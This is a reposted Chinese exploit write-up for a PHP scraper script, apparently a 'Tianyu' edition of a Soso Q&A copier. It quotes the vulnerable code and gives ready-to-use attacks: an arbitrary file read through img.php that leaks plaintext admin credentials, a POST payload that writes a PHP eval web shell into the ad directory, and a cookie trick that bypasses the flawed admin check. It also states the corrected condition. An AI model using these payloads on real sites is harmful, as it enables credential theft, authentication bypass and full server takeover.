搜搜问问小偷程序天宇版任意文件读取漏洞

文章转载自『非安全中国网』地址: http://www.sitedirsec.com/exploit-1667.html
下载程序
http://dl.dbank.com/c02k44zw0h
1、前台任意文件读取漏洞：


img.php文件代码


<?php
$p=$_GET[''p''];
$pics=file($p);
for($i=0;$i< count($pics);$i++)
{
echo $pics[$i];
}
?>
典型任意文件读取没有任何验证


利用方法：/img.php?p=./admin/data.php


读取管理员帐号密码 明文的哦


2、后台任意代码写入：


admin_ad.php 最后一段代码


<?
}elseif ($_GET[''action'']=="add"){
//echo $_POST[''js_mb''];
$file="../ad/".$_POST[''js_file''];
$fp=fopen($file,"w");
fwrite($fp,stripslashes($_POST[''js_mb'']));
fclose($fp);
echo"<script>alert(''修改成功！'');location.href=''?id=ad'';</script>";
}
?>
利用 发送POST数据


path：/admin/admin_ad.php?action=add


POST数据包：js_file=x.php&js_mb=<?php eval($_POST[cmd]);?>


既可在网站ad 目录下生成一个x.php的一句话木马 密码cmd


该文件头部，验证不足：


<?
include(''data.php'');
if($_COOKIE[''x_Cookie'']!=$adminname and $_COOKIE[''y_Cookie'']!=$password){
echo"<script>location.href=''index.php'';</script>";
exit;
}
?>
逻辑错误知道其一即可绕过


后台的权限验证问题，设置Cookie：x_Cookie=用户名 或 y_Cookie 等于密码即可通过验证


if($_COOKIE[''x_Cookie'']!=$adminname and $_COOKIE[''y_Cookie'']!=$password){


这个逻辑漏洞很狗血，作者一定是蛋爆了才会这么写……


正确的应该为：


if($_COOKIE[''x_Cookie'']!=$adminname or $_COOKIE[''y_Cookie'']!=$password){


或者：


if($_COOKIE[''x_Cookie'']==$adminname and $_COOKIE[''y_Cookie'']==$password){